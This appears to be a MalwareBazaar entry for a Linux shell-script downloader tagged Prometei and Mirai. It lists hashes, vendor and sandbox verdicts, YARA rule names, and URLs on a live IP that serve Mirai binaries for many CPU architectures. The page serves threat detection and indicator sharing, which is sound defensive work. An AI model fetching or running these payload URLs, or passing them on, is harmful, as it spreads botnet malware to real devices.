MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Prometei


Vendor detections: 8


Intelligence 8 IOCs YARA 2 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe
SHA3-384 hash: 2d5e80fa6b8ccd4647cab1770d43704b44ee43f66fdc230704173fe3d286b737ee98b9f68b403f8ad11529d37c485e56
SHA1 hash: e32341cfb0aa624c444ddc823c14f0fc329c6965
MD5 hash: 449633cd5ba6fe0ab0635bb8027acc89
humanhash: ten-romeo-king-summer
File name:b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe
Download: download sample
Signature Prometei
Create hunting rule
File size:1'646 bytes
First seen:2026-06-05 05:26:22 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 12:q0FgsV0Fg20FXc43fX0FCneekX0Fstk0Fs7Cd0FkaX0FaK1FZ0FkuGEX0Fgm0Fjr:vgs+gjXc4kCnasMwzsaK++EsgTCJlG7
TLSH T1D031A4CA32F10A70ADA0A927726EC80070E6F5CB19CA5FD87CDD39F6418DF497001AA3
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter c2hunter
Tags:Prometei sh wraith
URLMalware sample (SHA256 hash)SignatureTags
http://46.23.108.238/mipsd6181fab256865b24e4a8926786083b1476d1f39b792c6126535ff87526a67c0 Miraimirai wraith
http://46.23.108.238/mipsel104633cc17f2294fc5a6ac7f7224ab30b26be13908a3a64ade05b048af275f0e Miraimirai wraith
http://46.23.108.238/sh45ba1f8e403c81c479fb098384ea24c99cd2171827982552ca854e79ea713aefc Miraimirai wraith
http://46.23.108.238/x86c4b7349adb2e8fb25431c7f05dbff02eebe436ae6014d0423869c26969d406bd Miraimirai wraith
http://46.23.108.238/armv6laab64d03bf58874d37fbf8c07d003885a8dc3a75b30e623a82918ef13f90de7d Miraielf mirai ua-wget
http://46.23.108.238/armv7lb9f773d7b0318d62c42764c84c27d7618b9268117cb2d8b85f084d3dab4d33f6 Miraielf mirai ua-wget
http://46.23.108.238/i6869f2b9acf5ba4f3c9057eb20457cc5bf43606cb05e8188728aa3c62c834a87ce5 Miraielf mirai ua-wget
http://46.23.108.238/powerpc1939d20bc8e84b21e24f7eb6d09860c0071780ec1bb110718109a54c8a5d84b9 Miraielf mirai ua-wget
http://46.23.108.238/i58662eb9e723d53a1b836bfe87e2af0c38b94ddd6a65e14bd2a89b41dca9b2b96d8 Miraielf mirai ua-wget
http://46.23.108.238/m68k4286fa6edd5aa7c0a797b15c54cc5b0ebcdc7f1789592557660fe1b037d6781c Miraielf mirai ua-wget
http://46.23.108.238/sparcn/an/aelf ua-wget
http://46.23.108.238/armv4le0c87ef7802f4c48d6f8a51349006ed9f2c5759cdff62288316f678e8b7d676b Miraielf mirai ua-wget
http://46.23.108.238/armv5l1c07ec4db3c95af750a0160e579d538a0b5a107d49cbb5966912dddc0f6b0d8e Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
50
Origin country :
US US
Vendor Threat Intelligence
No detections
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
evasive
Link:
https://www.filescan.io/uploads/6a225e02099ef368af20cb95/reports/81c1f175-7802-4fc4-a0ca-73cf952cdd72/overview
Verdict:
Malicious
File Type:
unix shell
First seen:
2026-06-05T02:35:00Z UTC
Last seen:
2026-06-05T10:21:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Downloader.Shell.Agent.p HEUR:Trojan-Downloader.Shell.Agent.gen HEUR:Trojan-Downloader.Shell.Agent.cx HEUR:Trojan-Downloader.Shell.Agent.a
Link:
https://opentip.kaspersky.com/b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/92197c1b-850f-4f9d-baae-f187c6a4ced5
Behavior Graph:
Download SVG
%3 guuid=bf1fb0c0-2000-0000-d544-4823b1090000 pid=2481 /usr/bin/sudo guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488 /tmp/sample.bin guuid=bf1fb0c0-2000-0000-d544-4823b1090000 pid=2481->guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488 execve guuid=36a736c3-2000-0000-d544-4823ba090000 pid=2490 /usr/bin/wget net send-data write-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=36a736c3-2000-0000-d544-4823ba090000 pid=2490 execve guuid=6ab365ca-2000-0000-d544-4823ce090000 pid=2510 /usr/bin/chmod guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=6ab365ca-2000-0000-d544-4823ce090000 pid=2510 execve guuid=ebebb7ca-2000-0000-d544-4823d0090000 pid=2512 /usr/bin/bash guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=ebebb7ca-2000-0000-d544-4823d0090000 pid=2512 clone guuid=df8a7ccb-2000-0000-d544-4823d4090000 pid=2516 /usr/bin/rm delete-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=df8a7ccb-2000-0000-d544-4823d4090000 pid=2516 execve guuid=56d0cccb-2000-0000-d544-4823d5090000 pid=2517 /usr/bin/wget net send-data write-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=56d0cccb-2000-0000-d544-4823d5090000 pid=2517 execve guuid=a2490ed2-2000-0000-d544-4823e1090000 pid=2529 /usr/bin/chmod guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=a2490ed2-2000-0000-d544-4823e1090000 pid=2529 execve guuid=ee0754d2-2000-0000-d544-4823e3090000 pid=2531 /usr/bin/bash guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=ee0754d2-2000-0000-d544-4823e3090000 pid=2531 clone guuid=79f05dd3-2000-0000-d544-4823e7090000 pid=2535 /usr/bin/rm delete-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=79f05dd3-2000-0000-d544-4823e7090000 pid=2535 execve guuid=5ae8e6d3-2000-0000-d544-4823e9090000 pid=2537 /usr/bin/wget net send-data write-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=5ae8e6d3-2000-0000-d544-4823e9090000 pid=2537 execve guuid=ed7ab6d9-2000-0000-d544-4823f4090000 pid=2548 /usr/bin/chmod guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=ed7ab6d9-2000-0000-d544-4823f4090000 pid=2548 execve guuid=35b90cda-2000-0000-d544-4823f6090000 pid=2550 /usr/bin/bash guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=35b90cda-2000-0000-d544-4823f6090000 pid=2550 clone guuid=e8fddcda-2000-0000-d544-4823fa090000 pid=2554 /usr/bin/rm delete-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=e8fddcda-2000-0000-d544-4823fa090000 pid=2554 execve guuid=f9a952db-2000-0000-d544-4823fb090000 pid=2555 /usr/bin/wget net send-data write-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=f9a952db-2000-0000-d544-4823fb090000 pid=2555 execve guuid=0590fce0-2000-0000-d544-48230a0a0000 pid=2570 /usr/bin/chmod guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=0590fce0-2000-0000-d544-48230a0a0000 pid=2570 execve guuid=606c72e1-2000-0000-d544-48230c0a0000 pid=2572 /tmp/x86 net guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=606c72e1-2000-0000-d544-48230c0a0000 pid=2572 execve guuid=d55cdce1-2000-0000-d544-4823110a0000 pid=2577 /usr/bin/rm delete-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=d55cdce1-2000-0000-d544-4823110a0000 pid=2577 execve guuid=84fe20e2-2000-0000-d544-4823130a0000 pid=2579 /usr/bin/wget net send-data write-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=84fe20e2-2000-0000-d544-4823130a0000 pid=2579 execve guuid=c18ea1e8-2000-0000-d544-4823230a0000 pid=2595 /usr/bin/chmod guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=c18ea1e8-2000-0000-d544-4823230a0000 pid=2595 execve guuid=03f1ece8-2000-0000-d544-4823250a0000 pid=2597 /usr/bin/bash guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=03f1ece8-2000-0000-d544-4823250a0000 pid=2597 clone guuid=ab1426ea-2000-0000-d544-48232b0a0000 pid=2603 /usr/bin/rm delete-file guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=ab1426ea-2000-0000-d544-48232b0a0000 pid=2603 execve guuid=1a8d6aea-2000-0000-d544-48232d0a0000 pid=2605 /usr/bin/wget net send-data write-file zombie guuid=d6ed9ec2-2000-0000-d544-4823b8090000 pid=2488->guuid=1a8d6aea-2000-0000-d544-48232d0a0000 pid=2605 execve 98413952-e443-5dd6-8a9f-523973ad5749 46.23.108.238:80 guuid=36a736c3-2000-0000-d544-4823ba090000 pid=2490->98413952-e443-5dd6-8a9f-523973ad5749 send: 132B guuid=56d0cccb-2000-0000-d544-4823d5090000 pid=2517->98413952-e443-5dd6-8a9f-523973ad5749 send: 134B guuid=5ae8e6d3-2000-0000-d544-4823e9090000 pid=2537->98413952-e443-5dd6-8a9f-523973ad5749 send: 131B guuid=f9a952db-2000-0000-d544-4823fb090000 pid=2555->98413952-e443-5dd6-8a9f-523973ad5749 send: 131B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=606c72e1-2000-0000-d544-48230c0a0000 pid=2572->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=51f6b8e1-2000-0000-d544-48230d0a0000 pid=2573 /tmp/x86 guuid=606c72e1-2000-0000-d544-48230c0a0000 pid=2572->guuid=51f6b8e1-2000-0000-d544-48230d0a0000 pid=2573 clone guuid=a1febce1-2000-0000-d544-48230e0a0000 pid=2574 /tmp/x86 guuid=606c72e1-2000-0000-d544-48230c0a0000 pid=2572->guuid=a1febce1-2000-0000-d544-48230e0a0000 pid=2574 clone guuid=fb98c9e1-2000-0000-d544-48230f0a0000 pid=2575 /tmp/x86 net send-data zombie guuid=a1febce1-2000-0000-d544-48230e0a0000 pid=2574->guuid=fb98c9e1-2000-0000-d544-48230f0a0000 pid=2575 clone ba619ddb-a0ee-5a67-b966-0711c3cc8441 46.23.108.238:20008 guuid=fb98c9e1-2000-0000-d544-48230f0a0000 pid=2575->ba619ddb-a0ee-5a67-b966-0711c3cc8441 send: 9B guuid=d5ceb2e2-2000-0000-d544-4823160a0000 pid=2582 /tmp/x86 net send-data guuid=fb98c9e1-2000-0000-d544-48230f0a0000 pid=2575->guuid=d5ceb2e2-2000-0000-d544-4823160a0000 pid=2582 clone guuid=84fe20e2-2000-0000-d544-4823130a0000 pid=2579->98413952-e443-5dd6-8a9f-523973ad5749 send: 134B guuid=d5ceb2e2-2000-0000-d544-4823160a0000 pid=2582->ba619ddb-a0ee-5a67-b966-0711c3cc8441 send: 16238B guuid=1a8d6aea-2000-0000-d544-48232d0a0000 pid=2605->98413952-e443-5dd6-8a9f-523973ad5749 send: 134B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe/
Verdict:
Malicious
Threat:
Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe
Threat name:
Linux.Downloader.Morila
Create hunting rule
Status:
Malicious
First seen:
2026-06-05 05:27:24 UTC
File Type:
Text (Shell)
AV detection:
24 of 36 (66.67%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=wusmu7f27k4qjuajb6rj5o3zsqogl3a4iiarviruzqz7nvd47w7a._file
Result
Malware family:
n/a
Score:
  7/10
Tags:
credential_access defense_evasion discovery linux
Link:
https://tria.ge/reports/260605-f43ftacv6q/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Reads system network configuration
Reads process memory
Creates a large amount of network flows
Enumerates running processes
Reads system routing table
File and Directory Permissions Modification
Executes dropped EXE
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
0.86
Link:
https://yomi.yoroi.company/submissions/b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:ach_202412_suspect_bash_script
Create hunting rule
Author:abuse.ch
Description:Detects suspicious Linux bash scripts
Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Prometei

sh b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe

(this sample)

Mirai

elf d6181fab256865b24e4a8926786083b1476d1f39b792c6126535ff87526a67c0

  
Link
http://46.23.108.238/238bins.sh
  
Dropping
MD5 44d6ad643ad711263c90ee5eac4c113d
  
Dropping
SHA256 d6181fab256865b24e4a8926786083b1476d1f39b792c6126535ff87526a67c0

Comments